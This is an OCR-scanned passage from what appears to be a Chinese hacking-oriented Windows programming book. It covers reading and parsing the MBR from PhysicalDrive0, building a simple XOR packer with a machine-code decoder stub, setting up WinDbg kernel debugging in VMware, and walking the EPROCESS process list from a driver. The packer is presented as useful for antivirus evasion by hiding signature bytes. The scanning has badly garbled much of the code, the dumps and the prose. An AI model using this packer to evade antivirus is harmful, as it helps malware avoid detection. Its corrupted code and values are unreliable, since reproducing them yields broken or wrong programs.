fan ( LA (eNO < ST22 Et ) 

{ 
peintEe (sO Ye W(BYTE MDE FLT) 
et 二) 
{ 


} 


Rrintt uNoNnn 


} 


// 解析 MBR 
VOID ParseMbr (MBR Mbr) 
{ 
printf(" 引 时 记录 ; MNr\n")? 


for ( int, dE£ 0 TI< BOOTRECORDSITZE; BL F444 ) 
{ 
printf("%02X ", Mbr.BootRecord.BootRecord[i]); 
i 6 sa,0 ) 
{ 
Printf (NENn)? 
} 
} 


而 站 NEN 


printf ("磁盘 签名 : \r\n"); 
For (ol < 
{ 
printf("%02X ", Mbr.ulsigned[i]); 
3 


printE ("Ne Na) 


printf ("解析 分 区 表 : \rNn"); 
ie 
{ 

Printt( uO "Mor Dot Do ty 

EE S00) 

{ 

和 EN 
} 


printel( Ne Na) 


茸 蔓 训 将 前 其 只 湘 ”山名 














山 o 丙 


节 惠 空 将 前 鄞 肉 湘 
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PDP pDp 
fr 


{ 


(PDP) & (Mbx¥ .Dpt .Dpt); 
Q7 1 < DPTNUMBER? 1 + ) 


Lm 


printf ("引导 标志 : %02X ",，pDp[i] .BootSign) 7 

printf ("分 区 类 型 : %02X",， pDp[i],PartitionType); 

pente(l "NaN 

printf ("本 分 区 之 前 肩 区 数 : %d "，pDp[i] .SectorsInPpartition); 

printf (本 分 区 的 总 扇 区 数 : %d"，pDp[i] .SectorsIinPartition); 

站 天 下 和 区 

printf ("该 分 区 的 大 小 : 4%E \r\n", (double)pDp[i].SectorsInPartition / 1024 * 512 / 
TO A dA) 


BEDnEE( NNEN. VEN 
} 


printf ("结束 标志 : Nr\n"); 
oP tO 2 
{ 
printf("%02X ", Mbr.Endsign[li4]); 
} 


ESN VN 


int main(int argc, char* argv[]) 


/7 打开 物理 硬盘 设备 

HRANDLE hDevice = CreateFile(™\\\\.\\PhysicalDrive0", 
GENERIC READ, 
FILE SHARE READ | FILE SHARE WRITE, 
NULL, 
OPEN EXISTING, 
0， 
NULE) 六 

if ( hDevice == INVALID HANDLE VALUE ) 


{ 
printf ("CreateFile Error %d \r\n", GetLastError())’; 


于 
b 


MBR MBE = (0 x 
ShowMbr (hDevice, &Mbr); 
ParseMbr (Mbr); 
CloseHandle (hDevice); 
return 0; 
} 
代码 非常 短 ， 也 不 复杂 ， 看 起 来 跟 读 写 文件 没什么 太 大 的 差别 ， 其 实 就 是 在 读 写 文件 。 
前 面 介绍 过 ，Windows 将 各 种 设备 都 当 作 文件 来 看 待 ， 因 此 打开 硬盘 设备 的 时 候 直 接 使 用 
CreateFile0) 函 数 就 可 以 了 。 关 于 MBR 的 部 分 就 介绍 到 这 里 。 


8.5 “加 壳 与 脱 壳 


8.5.1 手动 加 过 


壳 是 一 种 较为 特殊 的 软件 。 壳 分 为 两 类 ， 一 类 是 压缩 壳 ， 另 一 类 是 加 密 壳 。 当 然 ， 还 有 
介 于 两 者 之 间 的 混合 壳 。 下 面 先 来 手动 为 一 个 可 执行 文件 加 一 层 外 壳 ， 需 要 准备 的 工具 有 








8.5 ”加 壳 与 脱 壳 





C32ASM、LordPE、 添 加 节 表 工具 和 OD。 

首先 用 LordPE 查看 可 执行 文件 ， 并 对 需要 的 几 个 数据 做 一 个 简单 的 记录 ， 如 图 8-78 
所 示 。 

在 LordPE 中 ,查看 几 个 需要 的 数据 ,包括 PE 文件 的 入 口 RVA、 映 像 地 址 和 代码 节 的 相 
关 数 据 。 有 了 这 些 数据 以 后 就 可 以 通过 C32ASM 对 代码 进行 加 密 了 。 用 C32ASM 以 十 六 进 
制 的 方式 打开 可 执行 文件 ， 然 后 从 代码 节 的 文件 偏 移 开 始 选择 ， 也 就 是 从 1000h 的 位 置 开 始 
选择 ， 一 直选 到 4fffh 的 位 置 。 然 后 单 击 右键 ， 在 弹出 的 快捷 菜单 上 选择 “修改 数据 ”命令 ， 
在 “修改 数据 ”对 话 框 中 选择 “ 异 或 ”算法 来 对 代码 节 进 行 加 密 ， 如 图 8-79 所 示 。 








se A a 
人 加 由) 诚 @ 




















图 8-78 PE 格式 中 需要 用 到 的 数据 图 8-79 用 “ 异 或 ”算法 对 代码 节 进 行 加 密 


使 用 0x88 对 代码 节 进 行 异 或 加 密 ， 单 击 “ 确 定 ” 按 钮 后 ， 代 码 节 被 修改 。 保 存 以 后 ， 使 
用 在 前 面 章节 编写 的 添加 节 表 的 软件 对 可 执行 文件 添加 一 个 新 的 节 ， 如 图 8-80 所 示 。 






| 7. 偏 敬 | 艺 头 小 | BE 偏 移 | 
taxt O0001000 “060003845 00001000 
raats 00005000 “0000060E “00005000 D0001000 4 


Qo0005000 _ 00001E03 00006000 “06001900 

















图 8-80 添加 新 节 区 


PUSHAD 

MOV EAX, 00401000 

XOR BYTE PTR DS;: [EAX],88 
INC BAX 

CMP EAX, 00404FEFE 

JNZz 00408006 

POPAD 

MOV EAX, 00401000 

JMP EAX 


以 上 代码 的 作用 是 将 上 面 修改 的 代码 节 内 容 还 原 ， 然 后 进行 保存 。 用 LordPE 修改 该 可 
执行 文件 的 入 口 和 代码 节 的 属性 ， 如 图 8-81、 图 8-82 和 图 8-83 所 示 。 





图 8-81 修改 入 口 点 


节 砷 空 将 前 其 只 湘 ” 超 吕 溃 
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图 8-82 ”添加 代码 节 属 性 图 8-83 ”修改 新 节 属性 


运行 修改 过 的 可 执行 文件 ， 可 以 正常 运行 。 一 -一 
ee 下 面 整理 一 下 思路 ， 以 方便 写 代 码 。 最 开始 用 LordPE 2 
查看 了 将 要 用 到 的 一 些 PE 信息 ， 然 后 用 C32ASM 对 代码 节 
进行 了 简单 的 异 或 加 密 ， 接 下 来 新 添加 了 一 个 节 ， 并 在 新 节 
中 写 入 了 还 原 代码 节 的 解密 指令 ， 最 后 用 LordPE 修改 了 文 
件 的 入 口 地 址 、 代 码 节 属 性 和 新 添加 节 的 属性 。 对 照 一 下 前 
后 两 个 文件 的 不 同 之 处 ， 如 图 8-84 所 示 。 


演 旨 齐 将 前半 明 狂 山 吕 收 





从 图 中 可 以 看 出 这 两 个 PE 文件 的 差别 ， 相 信 读 者 对 此 图 884 加 这 前 后 PE 文件 的 对 出 


已 经 没有 不 理解 的 地 方 了 。 下 面 开始 手动 打造 一 个 简单 的 加 壳 软 件 。 
8.5.2 编写 简单 的 加 壳 工 具 


其 实 不 按照 上 面 的 步骤 进行 也 可 以 ， 只 要 步骤 合理 就 可 以 。 这 里 主要 有 4 个 函数 需要 实 
现 ， 分 别 是 获取 PE 信息 GetPeInfo()、 添 加 新 节 AddSection()、 加 密 代码 节 Encode0 和 写 入 解 
密 代码 WriteDecode()。 获 取 PE 信息 和 添加 新 节 的 代码 实现 ， 前 面 已 经 介绍 过 了 ， 这 里 不 再 
重复 介绍 。 主 要 看 两 个 函数 的 代码 ， 分 别 是 Encode() 和 WriteDecode()。 

EncodeO) 函 数 的 作用 是 对 代码 节 的 内 容 进行 加 密 ， 这 里 选择 的 加 密 算 法 是 异 或 算法 。 在 
进行 加 密 以 前 需要 获得 代码 节 在 文件 中 的 位 置 ， 以 及 代码 节 的 长 度 。 有 了 这 两 个 信息 就 可 以 
进行 加 密 了 ， 代 码 如 下 : 

/7 加密 代 码 东 

VOID CMyShellDlg;:Encode() 

DWORD dwRead = 0; 


PBYTE pByte = NULL; 
pByte = (PBYTE)malloc(m SecTextinfo.Misc.VirtualSize); 


SetFilepointer (m hFile, m SecTextInfo.PointerToRawData, 0, FILE BEGIN); 
ReadFile(m hFile, PpByte, m SecTextIinfo.Misc.VirtualSize, &dwRead, NUEL); 


for { DWORD i = 0; i < m SecTextInfo.Misc.VirtualSize; i++ ) 


{ 
pByteli] 人 ^= 0x88; 


SetFilePointer(m hFile, m SecTextIinfo.PointerToRawData, 0,; FILE BEGIN); 
WriteFile(m hFile, pByte, m SecTextIinfo.Misc.VirtualSize, gdwRead, NULL); 


free(pByte); 
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WriteDecodeO 函 数 的 作用 是 将 对 代码 节 的 解密 代码 写 入 新 添加 的 节 中 ， 这 样 在 运行 真正 


代码 之 前 会 先 对 加 密 的 代码 进行 还 原 。 同 样 ， 解 密 的 代码 也 使 用 异 或 算法 进行 。 解 密 的 代码 和 
不 能 直接 写 入 C 代码 ， 而 是 要 写 入 机 器 码 。 机 器 码 可 以 到 OD 中 取得 ， 代 码 如 下 : 加 
00408000 > 60 PUSHAD 
00408001 B8 00104000 MOV EAX,HelloWor.00401000 黑 
00408006 8030 88 XOR BYTE PTR DS: [EAX],88 客 
00408009 40 INC EAX 
0040800A 3D 464B4000 CMP EAX,HelloWor.00404B46 编 
0040800F * 75 FE5 JNZ SHORT HelloWor.00408006 程 
00408011 61 POPAD 实 
00408012 B8 41104000 MOV EAX,HelloWor.00401041 例 
00408017 FEEO JMP EAX 剖 | 
在 虚拟 地 址 和 汇编 指令 的 中 间 部 分 就 是 汇编 指令 对 应 的 机 器 码 ， 将 其 取出 并 定义 为 C 语 析 
言 的 数组 ， 定 义 如 下 : 
char Decode[] = Ro ee ] 
TAN 区 607 
"\xbB\xO00\x00\x00\x00" 
"ANx80Nx30N\x88n" 
WEN 赤 页 0 
"\x3d\xff\x4f\x40\x00" 
ANXT5NxEF59 
WN 入 各 下 二 
"\xb8\xO00\xO00\x00\x00"™ 
NREFNAa0 


这 个 机 器 码 在 解密 的 过 程 中 要 根据 实际 的 PE 信息 进行 修改 ， 修 改 的 位 置 有 3 处 ， 分 别 
是 代码 节 的 起 始 虚拟 地 址 、 代 码 节 的 结束 虚拟 地 址 和 程序 的 原始 入 口 点 。 代 码 如 下 : 


VOID CMVShel1D1g:3:Wzitepecode() 
{ 
DWORD dwWrite = 0; 


// 写 入 代码 节 的 开始 位 置 

* (DWORD *)&Decode[2] = m dwImageBase + m SecTextIinfo.VirtualAddress; 

/7 代码 节 终 止 位 置 | 

*(DWORD *)&Decode[11] = m dwImageBase + m SecTextIinfo.VirtualAddress + m,. 
SecTextInfo,.Misc,.VirtualSize; 

// 写 入 OEP 

*(DWORD *)&Decode[l19] = m dwimageBase + m dwEntryPoint; 


SetFilePointer(m hFile, m, SecNewHdr.PointerToRawData, 0, FILE BEGIN),; 
WriteFile(m hFile, (LPVOID)Decode, sizeof (Decode), g&dwWrite, NULL); 
} 


这 就 是 解密 代码 ， 读 者 可 以 找 个 用 VC 写 的 程序 来 进行 测试 。 这 里 使 用 Release 版 的 
helloworld 测试 通过 。 

这 个 壳 属 于 袖珍 版 的 壳 , 严格 来 说 , 算 不 上 是 一 个 壳 , 但 是 这 个 壳 在 免 杀 领域 是 有 用 的 ， 
也 就 是 把 定位 到 的 特征 码 进行 加 密 ， 然 后 写 入 解密 代码 ， 从 而 隐藏 特征 码 。 一 个 真正 的 壳 会 
对 导入 表 、 导 出 表 、 资 源 、TLS、 附 加 数据 等 相关 的 部 分 进行 处 理 。 加 密 壳 会 加 入 很 多 反 调 
试 的 功能 ， 还 会 让 壳 和 可 执行 文件 融合 在 一 起 ， 达 到 “骨肉 相连 ”的 程度 来 增加 脱 壳 的 难度 。 


8.6 ”驱动 下 的 进程 忆 历 


前 面 的 章节 介绍 了 驱动 开发 的 基础 ， 在 这 里 进行 一 些 简单 的 补充 。 本 书 并 不 注重 内 核 层 
的 驱动 开发 , 但 是 由 于 内 核 驱动 对 于 安全 方面 有 着 重要 的 地 位 , 因此 这 里 做 一 个 简单 的 铺垫 ， 
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以 便 读 者 将 来 可 以 更 好 地 深入 学 习 。 

前 面 曾经 实现 过 一 个 枚 举 进程 中 被 加 载 DLL 文件 的 函数 , 接 下 来 要 实现 一 个 枚 举 进 程 的 
函数 。 枚 举 进程 不 能 在 用 户 态 下 进行 ， 需 要 到 内 核 态 下 进行 ， 这 样 就 必须 使 用 驱动 程序 来 完 
成 。 先 用 WinDbg 完成 一 次 手动 的 枚 举 过 程 ， 再 通过 代码 来 完成 。 


8.6.1 配置 VMware 和 WinDbg 进行 驱动 调试 


使 用 WinDbg 调试 驱动 程序 或 内 核 ， 需 要 双 机 进行 调试 。 所 谓 双 机 ， 就 是 两 台电 脑 。 通 
常情 况 下 ， 大 部 分 人 往往 只 有 一 台电 脑 。 那 么 ， 解 决 的 方法 就 是 安装 虚拟 机 ， 然 后 对 虚拟 机 
进行 一 些 设置 ， 也 是 可 以 通过 WinDbg 进行 调试 的 。 虚 拟 机 选择 使 用 VMware， 下 面 讨论 如 
何 对 虚拟 机 进行 配置 。 

安装 好 VMware， 并 在 VMware 中 安装 好 操作 系统 ， 然 后 对 安装 好 的 虚拟 机 进行 一 些 设 
置 。 通 过 此 设置 可 以 达到 调试 器 与 虚拟 机 的 连接 。 单 击 菜单 “VM” 一 “Settings” 命 令 ， 弹 
出 “Virtual Machine Settings ”对 话 框 ， 如 图 8-85 所 示 。 

单 击 “Add” 按 钮 ， 打开“Add Hardware Wizard”( 添 加 硬件 向 导 ) 对 话 框 ， 如 图 8-86 
所 示 。 









Ta ] | 证 
| Spacify he ount of memory alorated to ts yrtusl 
| msching, The memory sire must be a matople of 4MB. 
| 

Mespory for this whl machine: 






人 2764 











A Maximum recommended meriory: C1280 ME 
(Memory swanping may occur beyond this size} 





ar 


图 8-85 “Virtual Machine Settings ”对话 框 图 8-86 “Add Hardware Wizard” 对 话 框 1 


在 该 对 话 框 中 选择 “Serial Port” 选 项 ， 也 就 是 串口 ， 然 后 单 击 “Next” 按 钮 ， 弹 出 “Add 
Hardware Wizard” 对 话 框 的 第 二 个 界面 ， 如 图 8-87 所 示 。 

在 该 界面 中 选择 “Output to named pipe” 单 选 按钮 ， 也 就 是 命名 管道 。 命 名 管道 是 Windows 
下 进程 通信 的 一 种 方法 。 选 中 该 项 后 继续 单 击 “Next” 按 钮 ， 进 入 下 一 个 界面 ， 也 是 设置 的 
最 后 一 个 界面 ， 如 图 8-88 所 示 。 

在 这 个 界面 中 对 命名 管道 进行 设置 ， 然 后 单 击 “Finish ”按钮 即 可 。 至 此 ， 已 经 完成 了 一 
半 的 设置 。 接 着 ， 启 动 虚拟 机 配置 Windows 的 Boot.ini 文件 。Boot.ini 文件 原 内 容 如 下 : 


[boot loader] 
timeout=30 
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default=multi(0)disk(0)rdisk(0)partition (1) \WINDOWS 

[operating systems] 

multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /fa 
stdetect /Nopxecute=AlwaysOff 





Add Hardware Wizard wu Add Hardware Wizard Mo Wo 
Serial Port Type Specify Socket 
What media should this serial port access? Which socket should this serial port corinect to? 





APOE BR 
| 人 ppecon 1 





| Jrnis end is the server. 了 ] 





和 | 


= 人 





图 8-87 “Add Hardware Wizard” 对 话 框 2 图 8-88 “Add Hardware Wizard” 对 话 框 3 


将 最 后 一 行 复制 ， 然 后 放 到 最 后 面 ， 并 进行 修改 。 修 改 后 的 内 容 如 下 : 

[boot loader] 

timeout=30 

default=multi (0)disk(0)rdisk(0)partition(1)\WINDOWS 

[operating systems] 

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /三 
stdetect /NoExecute=AlwaysOff 

multi (0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fa 
stdetect /Nogxecute=optin /debug /debugport=coml /batudrate=115200 


去 掉 Boot.ini 文件 的 只 读 属性 , 然后 保存 Boot.ini 文件 。 在 下 次 需要 对 驱动 进行 调试 , 或 
者 对 内 核 进行 调试 时 ， 选 择 启动 Debug 模式 的 Windows。 





DH 注 : 这 里 只 介绍 了 针对 Windows XP 系统 的 配置 方法 。 关 于 其 他 版 本 系统 的 配置 方法 ， 请 自行 参考 相 
关内 容 。 


至 此 ， 所 有 的 配置 工作 都 做 好 了 ， 但 是 使 用 WinDbg 进行 连接 时 ， 还 是 要 有 连接 参数 的 。 
先 在 桌面 上 创建 一 个 WinDbg 的 快捷 方式 ， 然 后 在 WinDbg 快捷 方式 上 单 击 右键 ， 在 弹出 的 
快捷 菜单 中 选择 “属性 ”命令 ， 弹 出 “属性 ”对 话 框 ， 将 “目标 ”位 置 改 为 : 


F:\WinDDK\7600.16385.0\Debuggers\windbg.exe =b ~-k com:port=\\.\pipe\com 1,baud= 115200,pipe 


这 样 就 可 以 用 WinDbg 连接 虚拟 机 中 调试 状态 下 的 Windows XP 了 。 
8.6.2 EPROCESS 和 手动 遍历 进程 


Windows 中 有 一 个 非常 大 的 与 进程 上 有关 的 结构 体 一 一 EPROCESS。 每 个 进程 对 应 一 个 
EPROCESS 结构 ， 但 EPROCESS 是 一 个 系统 未 公开 的 结构 体 ， 在 WDK 中 只 能 找到 说 明 ， 
而 找 不 到 其 结构 体 的 具体 定义 , 因此 需要 通过 WinDbg 来 查看 。 这 次 使 用 WinDbg 和 VMware 
进行 调试 。 按照 前 面 的 方法 , 使 WinDbg 和 VMware 可 以 连接 。 当 WinDbg 出 现 调 试 界面 时 ， 
在 其 命令 处 输入 dt_eprocess 命令 来 查看 该 结构 体 ， 如 图 8-89 所 示 。 
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+0x248 ProcessExiting ‘Pes 2. Bit 
第 +0x248 ProcessDelete TREE 和 
+0x248 Wowbd4SplitPages : Pos 4, 1 Bit 
8 +0x248 VmDeleted ; Pos 5 ld Bit 
+Dx248 OutswapEnabled : Poe 6b. 1 Bt 
章 +0x248 Outswapped 1 Pos 7, 1 Bit 
+0x248 ForkFailed : Pes 39, 1 Bit 
+Dx248 HasEhysicsalVad 1 Fos 9. Bit 


1 
+0x248 AddressSpaceInitialized : Fos 10, 2 Bits 
+0x248 SetTimerResolution : Pos 12, 1 Bit 
+0x2486 BreakOnTermination ; Pos 13, 1 Bit 
+Ux248 SessionCreationlnderway : Pos 14, 1 Bit 
+0x248 WriteWatch Pos 15, 年 了 ii 训 
+0x248 ProcessInSession : Pos 16, 1 Bit 
+0x248 OverridehAddressSpace Fos 17, 1 Bit 
+0x248 HasaddressSpace  : Fos 18, 1 Bit 
+0x248 LaunchPrefetched Pos 19, 


主将 出 著 啊 油 


和 
章 +0xs248 InjectInpageErrors ; Pos 20, 1 Bit 
+0x248 VnTopDown Pes 21, 1 Bit 
析 +0x248 Unused3 : Pos 22, 1 Bit 
+Dx248 Unusedd 1 下 Ce 23,. 1 Blt 
+0x248 VdmAllowed ; Bos 24, 1 Bit 
+0x248 Unused : Bos 28.. 与 Bits 
+0x248 Unusedl : Pew 30 4 有 D+ 
EO +0x248 Unused2 : Pos 31, 1 Bit 
+0x24c ExitStatus Int4B 
+Dx250 NextPageColor : Uint2B 


+0x252 SubSvystemMdinorVersion : UChar 
+0x253 SubSvstemlMaijoryersion ; UChar 
+0x252 SubSystemVersion ; Uint2B 








+Ug254 FriorityClass : UChar 
+Dx255 VorkingSetAcquiredUnsafe : UChar 
+0x258 Cookie : Uint4B 








图 8-89 ”WinDbg 显示 的 部 分 EPROCESS 结构 体 


从 图 中 可 以 看 出 ，EPROCESS 结构 体 显示 出 非常 多 的 内 容 ， 从 WinDbg 调试 界面 只 能 看 
到 部 分 成 员 变 量 ， 而 且 偏 移 已 经 到 了 0x258， 非 党 多。 看 一 下 WinDbg 的 全 部 内 容 。 


kd> dt eprocess 
nt!_ EPROCESS 





+0x000 Pcb : ,KPROCESS // 进程 控制 块 
TOxXO0Ge ProcessLock 1 PUSH TOCK 

+0x070 CreateTime 5 LARGE INTEGER 

+0x078 ExitTime : _LARGE ITNTEGER 

+0x080 RundownProtect 7 _EX RUNDOWN_ REF 

+0x084 UniqueProcesslid Ca she of > Ro cn 

+0x088 ActivebrocessLinks ; LIST ENTRY // 活动 进程 链表 
+0x090 QuotaUsage > 3 Unta 

+0x09c QuotaPeak 2 LS Untds 

+0x0a8 CommitCharge 二 intde 

+0x0ac PeakVirtualsize : Uint4B 

+0x0b0 VirtualSsize UintaB 

+0x0b4 SessionprocessDinks TT 

+0x0be DebugPort 1 PCPA VGA 

+0x0c0 Exceptionport ?PEPSIYOTLd 

+0x0c4 ObjectTable 1 Ptta2 .HANDED TABLE 
+0x0c8 Token :EAST REF 

+0x0cc WorkingSetLock "ENSTIMUTEX 

+0x0ec WorkingSetPage * ,UintaAB 

+0x0f0 AddressCreationLock EAST MUEEX 

+0x110, HyperSpaceLock 1048 

+0x114 ForkInprogress -Ptr32 HRDAD 

+0x118 HardwareTrigger 名 EAA 

+Oxllc VadRoot Ptr32 Void 

TOxXL20 WadHlnit 忆 夺 各 2 访 可 汪 克 

+0x124 CloneRoot Et Voge 

+0x128 NumberOfPrivatePages Uint4B 

+0xl2c NumberOfLockedPages + 1 OATtAR 

+0x130 Win32Process uIPErS2I MOL 

t+0OxL34 Job 2 = si #2 A hE 

tOx138 SectionObyjecot i be oe 

+0xl3c SectionBaseAddress Ptr32 Vold 

+0x140 QuotaBlock Ptr32 /HRROCESS OUOFA BLOCK 
+0zx144 WorkingSetWateh Ptr32 _PAGEFAULT HISTORY 











8.6 驱动 下 的 进程 遍历 
+0x148 Win32WindowStation ee 
+0x14c de Pt VOL 
+0x150 LdtIinformation Ptr32 VS 第 
+0x154 VadFreeHint el 8 
+0x158 VdmObjects Ptr32 Vo EE 
+Oxl5c DeviceMap Ptr32 Void 
+0x160 PhysicalVadList + TLLST DNTRY 
+0x168 PageDirectoryPte : _HARDWARE PTE 黑 
+Ox168 Filler 2 Ut 客 
+0x170 Session Ptr32 Void 编 
+0x174 ImagerileName [16] UChar /7 进程 名 程 
+0x184 JobLinks “LIST ENTRY 实 
+0xl8c LockedPagesList Ptr32 Veld 例 
+0x190 ThreadListHead DIST ENTRY 剖 
永基 外 和 8 SecurityPort 1 EVDLG 析 
+0x19c PaeTop PELS2N Yoel 
+0xla0 ActiveThreads Uint4B 
+0xla4 GrantedAccess Uint4B 
+0xla8 DOr rd re :intAB 
+0Oxlac LastThreadExitStatus Int4B 
+0x1b0 Peb Ptr32 _PEB /7 进程 环境 块 
+0xl1b4 PrefetchTrace EX _ FAST REF 
+0x1b8 ReadOperationCount _LARGE INTEGER 
+0x1lc0 WriteOperationCount LARGE INTEGER 
+0xlc8 OtherOperationCount _LARGE INTEGER 
+0xld0 ReadTransferCount _LARGE TNTEGER 
+0xld8 WriteTransferCount _LARGE INTEGER 
+0xle0 OtherTransferCGount _LARGE INTEGER 
+0xle8 CommitChargeLimit : Uint 4B 
+0Oxlec CommitChargePeak » Uint4B 
+0x1f0 AweInfo ee pe on Ks 
+Ox1lf4 SeAuditProcessCreationInfo _SE AUDIT PROCESS _ CREATION INEO 
十 0 区 1E8 Vm TUMMSUBRORA 
+0x238 LastFaultCount : Uinta4p 
+0x23c ModifiedPpageCount Uint4B 
+0x240 NumberOfVvads Uint4B 
+0x244 JobStatus Uint4B 
+0x248 Flags Uint4B 
+0x248 CreateReported Beal Oh Bt 
+0x248 NoDebugInherit Ros hy 
+0x248 ProcessExiting Gg 放下 吉本 起 
+0x248 ProcessDelete “TRO 3 
+0x248 Wow64SplitPages TD De pa nih 
+0x248 VmDeleted 生生 二 和 
+0x248 OUtSswapEnabled Pasa Gr Bt 
+0x248 Outswapped 这 机 
十 0x248 ForkFailed BG BL 
+0x248 HasphysicalVad “mEes'9, LBit 
+0x248 AddressSpaceTnitialized,': Bos 10, 2 Bits 


+0x248 
+0Ox248 
+0x248 
+0x248 
+O0x248 
+0x248 
+0xX248 
+0x248 
+Ox248 
+0x248 
tOx248 
+0x248 
+0x248 
十 0X248 
+0x248 
+0x248 
+0x24c 
+0x250 


SetTimerResolution 
BreakOnTermination 
SessionCreationUnderway 
WriteWatch 
ProcessInSession 
OverrideAddressSpace 
HasAddressSpace 
LaunchPprefetched 
InjectIinpageBrrors 
VmTopDown 

Unused3 

Unused4 

VamAllowed 

Unused 

Unusedli 

Unused2 

ExitStatas 
NextPageColor 


ee 二 让 下 汪 丰 
HE ee ts he 
a POs Nh Bd 
epoa lo. Ht 
A a I ee 
EP a oA yf 
Pos le dn 
A Mp a 
CA £0 a a ly 
Pe 
CE es 
LA = de = 
He 
aS 
2 Eosn 3 1 Bit 
"Rags nL 

Int4B 

Uint2B 
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+0x252 SubSystemMinoeVeEsdion I UChas 
+0x253 SubSsystemMaijorVersion :Uhas 
+0X252 SubSystemVersion :| Uint2B 


+Ox254 PriorityClass PG b> 
+0x255 WorkingSetAcquiredUnsafe : UChar 
+0x258 Cookie 2 En 


上 面 就 是 EPROCESS 结构 体 的 全 部 。 对 于 遍历 进程 列表 来 说 ， 有 用 的 只 有 几 个 内 容 ， 首 
先是 偏 移 0x84 处 的 进程 ID， 然 后 是 偏 移 0x88 处 的 进程 链表 ， 最 后 一 个 是 偏 移 0x174 的 进程 

下 面 手动 进行 一 次 遍历 。 

在 WinDbg 的 命令 输入 提示 处 输入 ! Process 0 0 命令 ， 得 到 进程 的 列表 ， 如 图 8-90 所 示 。 


SS SPGDTST7 Ex 


ROCESS ftf364706 Sessionld: 0 Cid- 0600 Peb: ?ffde000 ParentCid; 05f0 
DirBase’ D6e3ale0 ObjectTable. etce2640 HandleCount: 376. 
Image’; exploOrer .exe 


山 c 商 











尝 悟 主将 前 赃 啊 酒 


ROCESS ff2b4428 Sessionld; 0 Cid: 06b8 Peb: ?ffdc000 FarentCid; 0600 
DirBsse: 06e38240 NbiectTable: e1921f18 HandleCount a 
Inage; VMwareTray exe 


| 


ROCESS ff2b74f8 Sessionld; 0 Cid: 06c0 Peb: 7ffde00n ParentCid: 0600 
DirBase: D6e38220 ObiectTable; el600d90 HandleCownt - 219 
Inage: ViwareTser ,exe 


ROCESS ftf345480 Sessionld: 0 Cid: D6d4 Peb: ?fftdc000 ParentCid: 0600 
DirBsse 06e380e0 ObijectTable; elIB5da60 HandleCount 7 六 
Inags: ctfmon,exe 


PROCESS ff£3003c0 Sessionld; 0 Cid; 0388 Peb; 7ftd9000 ParentCid;: 029c 
DirBase: D6e3B1ch) ObjectTable: Ele05928 HandleCount, 144 
Image: VMwareService,exe 


PROCESS ftt2218b0 SessionId; 0 Cid; 07e0 Peb, 7ftd9000 ParentCid; 029c 
DirBase: 06e38260 DbiectTable: stl80n33a0 HandleCownt; i101 
Imnage: alg.exe 


PROCESS ff2balbd SessionIld: 0 Cid: 01f4 Peb;: 7ffds000 ParentCid; 0420 
DirBase: Dbe38200 ObijectTable; el857ba8 HandleCount 93 
Image: wuauclt exe 


PROCESS ft205828 SessionId: 0 Cid: 0248 Peb: ?7fftdd000 ParentCid; 0600 
DirBase; 06e382a0 ObjectTable; el0f46c8 HandlaCount 3 
Image: KmdiManager. Exe 











a a 


图 8-90 ”进程 信息 


PROCESS 后 面 给 出 的 值 就 是 当前 进程 中 EPROCESS 的 地 址 ， 选择 explorer.exe 进程 给 


出 的 地 址 0xff364708 来 解析 EFPROCESS。 输 入 命令 dt_eprocess ff364708， 输 出 如 下 : 


kd> dt eprocess ff£f364708 
nt!l ERROCESS 
ONOD PED oI KEROCHSS 
+0x06c ProcessLock ,EX PUSH LOCK 
+0x070 CreateTime .LARGE_INTEGER Oxlcb6afs 91d56cea 
+0x078 ExitTime _LARGE INTEGER OQx0 





se de 


+0x080 RundownProtect : _EX RUNDOWN REF 

+0x084 UniqueProcessId ; Ox00000600 

+0x088 ActiveProcessLinks 2 SMIDNTIRYE EQxtf2b4d4b0 + Oxted36a0ae 
< 部 分 省 略 > 

+0x174 ImageFileName i TL16], "explorer,exe" 

< 部 分 省 略 > 

+0xlb0 Peb 9 

< 后 面 省 略 > 


可 以 看 到 ， 按 照 EPROCESS 结构 体 解析 ff364708 地 址 ， 输 出 了 需要 的 内 容 。 接 着 ， 通 


过 ActiveProcessLinks 获取 下 一 个 进程 的 信息 。 输 入 命令 dd ff364708 + 0x88， 输 出 如 下 : 


ke> "ed EE364D8 + Ox88 

ff364790 | ff2b44b0 ff£3640a8 00002940 00021944 
ff3647a0 00000a92 00003940 00024cb4 00000bf8 
££3647b0 00000a92 05e04000 0563a000 ff2b44dc 
ff£3647c0 ££f3640d4 00000000 el5b6eb8 elce2640 
ff3641d0 el68E£389 00000001 £39a5440 00000000 
f£f3647e0 00040001 00000000 ff3647e8 ff3647e8 
££3647f£0 0000003d 000059ca 00000001 £39a5440 
ff364800 00000000 00040001 00000000 ££f36480c 








8.6 ”驱动 下 的 进程 遍历 





ff364790 地 址 处 保存 了 下 一 个 EPROCESS 结构 体 ActiveProcessLinks 的 地 址 。 要 得 到 下 





一 个 EPROCESS 的 地 址 ， 必 须 减 去 0x88 才 行 。 输 入 命令 dt _eprocess (ff2b44b0 - 0x88)， 输 六 
出 如 下 : 章 
kd> dt eprocess (ff2b44b0 = 0x88) 
nt! EPROCESS 里 
+0xX000 Pcb :" KEROGESS 客 
+0X06cC ProcessLock » LBXIPUSNILOCK 
+0x070 CreateTime ;LARGE INTEGER OXLEP6aft5 95026ecc 编 
+0x078 ExitTime : LARGE INTEGER 0x0 程 
+0x080 RundownProtect : _EX RUNDOWN_REF 实 
+0x084 UniqueProcessId : 0x000006b8 例 
+0x088 ActiveProcessLinks : LIST ENTRY [ 0xfE2b7580 -~ 0xff364790 ] 剖 
< 后 面 省 略 > 析 
+0x174 ImageFileName 3 [1L6] "VMwareTray iexe™ 
< 后 面 省 略 > 


将 输出 结果 和 图 8-90 中 的 结果 对 比 ，explorerexe 的 下 一 个 进程 为 VMwareTray.exe。 可 wn 
见 遍历 方法 是 正确 的 。 


8.6.3 ”编程 实现 进程 遍历 


上 面 介绍 的 手动 遍历 过 程 就 是 指导 用 户 如 何 编写 代码 的 ， 只 要 能 够 掌握 上 面 的 手动 遍历 
过 程 ， 那 么 代码 的 编写 也 就 不 是 问题 了 。 下 面 直接 看 代码 : 


NTSTATUS DriverEntry! 
; PDRIVER OBJECT pDriverQbject, 
PUNICODE STRING pRegistryPath) 





PEPROCESS pEprocess = NULL; 
PEPROCESS pFEirstEprocess = NULL; 
ULONG ulProcessName = 0; 

ULONG ulProcess1d = 0; 


pDriverObject—>DriverUnload = DriverUnload; 
